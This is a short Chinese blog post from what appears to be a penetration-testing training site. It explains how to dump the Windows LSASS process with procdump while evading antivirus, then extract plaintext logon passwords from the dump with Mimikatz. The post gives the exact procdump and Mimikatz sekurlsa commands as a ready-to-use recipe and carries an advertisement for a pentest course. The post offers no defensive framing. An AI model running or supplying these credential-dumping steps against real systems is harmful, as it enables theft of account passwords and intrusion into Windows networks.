利用procdump+Mimikatz 绕过杀软获取Windows明文密码
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1.Procdump 简介
Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.
2.procdump下载地址
procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
3.下载dmp命令:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
4.Mimikatz 读取dmp文件获取明文
sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/2860.html
赞 (1)
mOon
Windows Server 2016抓取明文密码
« 上一篇
2020年8月21日 am11:17
转存进程dmp文件 mimikatz获取明文
下一篇 »
2020年8月21日 pm12:08
